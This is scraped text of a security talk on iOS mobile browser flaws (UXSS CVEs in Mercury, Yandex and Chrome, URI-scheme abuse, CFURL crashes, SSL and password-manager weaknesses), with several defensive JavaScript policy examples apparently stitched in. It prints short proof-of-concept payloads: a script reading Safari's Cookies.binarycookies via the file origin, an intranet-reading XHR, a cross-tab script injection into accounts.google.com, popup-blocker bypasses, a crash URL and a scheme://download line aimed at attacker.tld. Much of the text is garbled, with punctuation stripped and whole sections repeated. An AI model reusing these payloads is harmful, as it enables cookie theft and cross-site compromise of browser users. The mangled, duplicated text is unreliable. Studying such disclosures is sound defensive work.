CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 43: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/43.jpg)
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 44: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/44.jpg)
CVE-2013-6893: Mercury UXSS
w.document.write('Hi')
mb.exec$(WINDOW_ID)[ "command":"window.document.write", "target":1234, "html":"Hi" ]
[webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
UXSS: Universal Cross-Site Scripting
CVE-2013-6893: Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>'); …and it just works in accounts.google.com.
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files.
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView, UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] → nil (malformed URL string)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) → NULL
• Downloads opened directly from file://
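The fixes on the slides above come down to one policy decision the bridge has to make at write time: compare the caller's origin with the child tab's current URL, and treat about:blank, nil base URLs and anything that fails to parse as an opaque origin that matches nothing. The following is an added example, not code from the deck or from any of the browsers it names: the JavaScript side of a hypothetical cross-tab bridge that keeps a registry of each tab's current URL and re-checks origin on every document.write. `TabRegistry`, `parseOrigin`, `sameOrigin` and the sample URLs are assumed names and constructed values.

```javascript
// Added example (hypothetical bridge, not the deck's code): origin policy for
// cross-tab document.write in a UIWebView-based browser, written for Node.js.

// Parse a URL into an origin tuple, or return null for anything without a real
// web origin: about:blank, file://, applewebdata://, or a string that does not
// parse. Null stands for an opaque origin and never compares equal to anything.
function parseOrigin(urlString) {
  if (typeof urlString !== 'string') return null;
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null; // unparseable: this is where the native side would get nil/NULL
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (!/^[a-z0-9.-]+$/i.test(u.hostname)) return null; // reject odd hosts outright
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return { scheme: u.protocol, host: u.hostname.toLowerCase(), port };
}

// Classic scheme/host/port comparison; opaque origins (null) never match,
// not even with themselves.
function sameOrigin(urlA, urlB) {
  const a = parseOrigin(urlA);
  const b = parseOrigin(urlB);
  if (a === null || b === null) return false;
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// The bridge keeps the *current* URL of every tab. The CVE-2013-7197 pattern
// (check on window.open, never again) fails because the child can be
// redirected after it was opened; the check has to run at write time.
class TabRegistry {
  constructor() {
    this.tabs = new Map();
    this.nextId = 1;
  }
  open(openerUrl, targetUrl) {
    const id = this.nextId++;
    this.tabs.set(id, { opener: openerUrl, url: targetUrl });
    return id;
  }
  // Called by the native side on every navigation or redirect of the tab.
  navigate(id, newUrl) {
    const tab = this.tabs.get(id);
    if (tab) tab.url = newUrl;
  }
  // Decide whether `callerUrl` may document.write into tab `id` right now.
  canWrite(callerUrl, id) {
    const tab = this.tabs.get(id);
    if (!tab) return false;
    return sameOrigin(callerUrl, tab.url);
  }
}

// Constructed walk-through of the redirect case.
const registry = new TabRegistry();
const tabId = registry.open('https://attacker.example/', 'https://attacker.example/child');
console.log('before redirect:', registry.canWrite('https://attacker.example/', tabId)); // true
registry.navigate(tabId, 'https://accounts.example/login');
console.log('after redirect:', registry.canWrite('https://attacker.example/', tabId)); // false
```

The native half of the same fix is the one the deck gives: load the written HTML with baseURL about:blank (or, on iOS 8, let WKWebView create the child view through the UIDelegate), so a denied or opaque case never falls through to a nil baseURL.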
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other with an .html filename
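The Content-Disposition and Content-Type slides above describe one decision: given a response's headers, what may the browser render it as, and in which origin? Below is an added example of that decision as a pure function, not code from the deck or from any browser it names; the header values are constructed and `displayPolicy` is an assumed name. It never upgrades text/plain or a binary type to HTML on the strength of a filename or the body, and it shows attachments from an isolated origin rather than the hosting site's.

```javascript
// Added example (not the deck's code): how a browser app should decide the
// rendering mode and origin for a fetched response. Node.js.

// Media type from a Content-Type header, without parameters, lower-cased.
function mediaType(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

// headers: object with lower-cased header names (constructed input).
// requestUrl is carried through for the caller but deliberately not consulted:
// a path ending in .html must not influence how the bytes are treated.
// Returns { render, origin, url }:
//   render: 'html' | 'text' | 'download'
//   origin: 'site' (the hosting site's origin) or 'isolated' (a unique origin
//           with no access to the site's cookies or DOM)
function displayPolicy(headers, requestUrl) {
  const type = mediaType(headers['content-type']);
  const disposition = (headers['content-disposition'] || '').trim().toLowerCase();
  const isAttachment = disposition.startsWith('attachment');

  let render;
  if (type === 'text/html' || type === 'application/xhtml+xml') {
    render = 'html';
  } else if (type.startsWith('text/')) {
    // text/plain stays text whatever the body looks like (CVE-2013-5151 class).
    render = 'text';
  } else {
    // application/octet-stream, application/other, a missing type, ...: a
    // download, even when the URL or the filename parameter ends in .html.
    render = 'download';
  }

  // Attachments and downloads never run in the hosting site's origin
  // (CVE-2011-3426 class); the file is displayed from an isolated origin.
  const origin = (isAttachment || render === 'download') ? 'isolated' : 'site';
  return { render, origin, url: requestUrl };
}

// Constructed sample: an HTML attachment and an octet-stream named .html.
console.log(displayPolicy(
  { 'content-type': 'text/html', 'content-disposition': 'attachment; filename="a.html"' },
  'https://site.example/a'));                                   // html, isolated
console.log(displayPolicy(
  { 'content-type': 'application/octet-stream' }, 'https://site.example/evil.html')); // download, isolated
```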
JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);
  x.send();
  alert(x.responseText);
}
</script>
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>
Challenge: Hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal)
• Registered (external)
• scheme://download?https://secure.tld/victim/data → scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
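Taken together, the popup-blocker, URI-scheme and CFURL slides describe one gate a browser app needs in front of its URL handling: classify what page content asks the browser to open before the string reaches CFURL/NSURL, a registered app, or the internal bridge. Below is an added example of such a gatekeeper, not code from the deck or from any browser it names; the scheme lists, `classifyNavigation` and the sample URLs are assumptions. It refuses the malformed percent-encodings the deck tested instead of letting a NULL reach native code, keeps bridge commands unreachable from page content, and takes the user-gesture signal from the native side rather than from a rewritten href.

```javascript
// Added example (hypothetical browser, not the deck's code): gatekeeper for
// URLs that page content asks the browser to open. Node.js.

const WEB_SCHEMES = new Set(['http:', 'https:']);
const LOCAL_SCHEMES = new Set(['file:', 'applewebdata:']);
const BRIDGE_SCHEMES = new Set(['mybrowser-bridge:']); // assumed internal JS<->ObjC scheme
const HOSTNAME = /^[a-z0-9.-]+$/i;
// A '%' not followed by two hex digits. CFURL returned NULL for such inputs in
// the deck's tests, and callers then dereferenced it; reject them up front.
const BAD_PERCENT = /%(?![0-9a-f]{2})/i;

// ctx.fromPageContent: the request came from a page (href, iframe src, script,
// redirect) rather than from the browser's own UI.
// ctx.userGesture: set by the native navigation delegate from the actual
// navigation type, never from a page-side target=_blank rewrite.
function classifyNavigation(urlString, ctx) {
  const reject = (reason) => ({ action: 'reject', reason });
  if (typeof urlString !== 'string') return reject('not a string');
  if (BAD_PERCENT.test(urlString)) return reject('malformed percent-encoding');
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return reject('unparseable URL');
  }
  if (WEB_SCHEMES.has(u.protocol)) {
    if (!HOSTNAME.test(u.hostname)) return reject('invalid host');
    return { action: 'load', url: u.href };
  }
  if (LOCAL_SCHEMES.has(u.protocol)) {
    // Local origins have no same-origin policy; page content never picks them.
    if (ctx.fromPageContent) return reject('local scheme from page content');
    return { action: 'load', url: u.href };
  }
  if (BRIDGE_SCHEMES.has(u.protocol)) {
    // Bridge commands (download, add-filter, ...) are for the browser UI only.
    if (ctx.fromPageContent) return reject('bridge scheme from page content');
    return { action: 'bridge', command: u.hostname, params: Object.fromEntries(u.searchParams) };
  }
  // Anything else is a registered external scheme (googlechrome:, merc:, ...):
  // treat it like a popup and require a real user gesture.
  if (!ctx.userGesture) return reject('external scheme without user gesture');
  return { action: 'external', url: u.href };
}

// Constructed contexts for the two common callers.
const FROM_PAGE = { fromPageContent: true, userGesture: false };
const FROM_UI = { fromPageContent: false, userGesture: true };

console.log(classifyNavigation('http://%5c', FROM_PAGE));                 // reject
console.log(classifyNavigation('googlechrome://example.com', FROM_PAGE)); // reject: no gesture
console.log(classifyNavigation('mybrowser-bridge://download?url=http://attacker.tld/README.html', FROM_PAGE)); // reject
```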
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
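The three password-manager bullets above are the conditions the save and fill paths have to enforce. Below is an added example of both checks as pure functions, not code from the deck or from any browser it names; `credentialKey`, `shouldSaveCredential`, `shouldAutofill` and the sample URLs are assumptions. The key includes the scheme, so a credential saved on https is never filled on an http page; the fill path refuses subframes; and the save path refuses to file a credential under any origin other than the one that displayed the form.

```javascript
// Added example (not the deck's code): save/fill policy for a browser
// password manager. Node.js.

// Origin key a credential is stored under: scheme + host + non-default port.
// http and https give different keys on purpose.
function credentialKey(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null;
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.protocol + '//' + u.host; // u.host keeps an explicit non-default port
}

// Save path: a login form shown on formPageUrl was submitted to actionUrl.
// Returns the key to store the credential under, or null to refuse.
function shouldSaveCredential(formPageUrl, actionUrl, isTopFrame) {
  if (!isTopFrame) return null; // subframes cannot trigger a save
  const pageKey = credentialKey(formPageUrl);
  const actionKey = credentialKey(actionUrl);
  if (pageKey === null || actionKey === null) return null;
  // The form must post to its own origin: a page cannot plant a credential
  // under another site's key by pointing the form action there.
  return pageKey === actionKey ? pageKey : null;
}

// Fill path: may the credential stored under savedKey be filled on pageUrl?
function shouldAutofill(savedKey, pageUrl, isTopFrame) {
  if (!isTopFrame) return false; // top frame only, as the deck notes
  const pageKey = credentialKey(pageUrl);
  return pageKey !== null && pageKey === savedKey;
}

// Constructed walk-through: save on https, then attempt a fill on http.
const key = shouldSaveCredential('https://login.example/signin', 'https://login.example/session', true);
console.log('saved under:', key);                                              // https://login.example
console.log('fill on http:', shouldAutofill(key, 'http://login.example/signin', true)); // false
```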
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
![Page 48: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/48.jpg)
CVE-2013-7197: Yandex UXSS
• Same-origin check implemented in window.open()
• Not rechecked in window.document.write()
• Redirect the child window after window.open()
UXSS: Universal Cross-Site Scripting
Bug Bounty :-)
![Page 49: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/49.jpg)
CVE-2012-2899: UXSS in Google Chrome
UXSS: Universal Cross-Site Scripting
![Page 50: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/50.jpg)
CVE-2012-2899: Chrome UXSS
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:href];
UXSS: Universal Cross-Site Scripting
![Page 51: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/51.jpg)
CVE-2012-2899: Chrome UXSS
• w = window.open('about:blank'); w.document.write(…);
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil];
UXSS: Universal Cross-Site Scripting
![Page 52: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/52.jpg)
CVE-2012-2899: Chrome UXSS
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file:// - no same-origin policy: access to any web origin and to local files.
UXSS: Universal Cross-Site Scripting
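Added example, not code from the talk or from Yandex or Chrome: a Node-runnable model of the JavaScript-to-native bridge a UIWebView browser uses for cross-tab document.write(), covering both the CVE-2013-7197 pattern (origin checked only at window.open(), child redirected afterwards) and the CVE-2012-2899 pattern (an about:blank child becoming baseURL:nil and so the applewebdata:// origin), beside a policy that rechecks on every write and never passes nil. The tab objects, scenario URLs and function names are constructed for this example.

```javascript
// Origin as the bridge should compare it. WHATWG URL returns "null" for
// about:blank and file: URLs, which is what we want: an opaque origin must
// never compare equal to a real web origin.
function originOf(href) {
  try {
    return new URL(href).origin;
  } catch (e) {
    return 'null';
  }
}

// A tab as the bridge sees it (constructed model). hrefAtOpen is what
// window.open() received; currentHref changes whenever the tab navigates,
// for example when the opener sets w.location after opening it.
function makeTab(href) {
  return { hrefAtOpen: href, currentHref: href };
}

function navigate(tab, href) {
  tab.currentHref = href;
}

// recheckAtWrite = false reproduces the vulnerable behaviour:
//   - the same-origin decision is made once in window.open() and cached;
//   - document.write() hands the child's href to loadHTMLString:baseURL:,
//     and an about:blank child becomes baseURL:nil (null here), which
//     UIWebView renders in the applewebdata:// origin with no SOP at all.
// recheckAtWrite = true is the corrected policy:
//   - the opener's and the child's *current* URLs are compared on every write;
//   - about:blank gets an explicit about:blank base URL, never nil.
function makeBridge(openerHref, childHref, { recheckAtWrite }) {
  const opener = makeTab(openerHref);
  const child = makeTab(childHref);
  const sameOrigin = (a, b) => b === 'about:blank' || originOf(a) === originOf(b);
  const allowedAtOpen = sameOrigin(opener.hrefAtOpen, child.hrefAtOpen);

  return {
    opener,
    child,
    write(html) {
      const allowed = recheckAtWrite
        ? sameOrigin(opener.currentHref, child.currentHref)
        : allowedAtOpen;
      if (!allowed) {
        return { allowed: false, baseURL: null, origin: null, html: null };
      }
      let baseURL = child.currentHref;
      if (child.currentHref === 'about:blank') {
        baseURL = recheckAtWrite ? 'about:blank' : null;
      }
      // Origin the native side would render the HTML in: nil baseURL is the
      // applewebdata:// case the slide describes.
      const origin = baseURL === null ? 'applewebdata://' : originOf(baseURL);
      return { allowed: true, baseURL, origin, html };
    },
  };
}

// Scenario 1 (CVE-2013-7197 pattern, constructed URLs): a tab on
// attacker.example opens a same-origin popup, then navigates it to a login
// page on another origin before calling document.write().
function redirectedChildScenario(recheckAtWrite) {
  const bridge = makeBridge('https://attacker.example/', 'https://attacker.example/popup', { recheckAtWrite });
  navigate(bridge.child, 'https://accounts.example/login');
  return bridge.write('Hi');
}

// Scenario 2 (CVE-2012-2899 pattern): the child is about:blank, so the
// vulnerable bridge has no URL to pass as baseURL.
function aboutBlankScenario(recheckAtWrite) {
  const bridge = makeBridge('https://attacker.example/', 'about:blank', { recheckAtWrite });
  return bridge.write('Hi');
}
```

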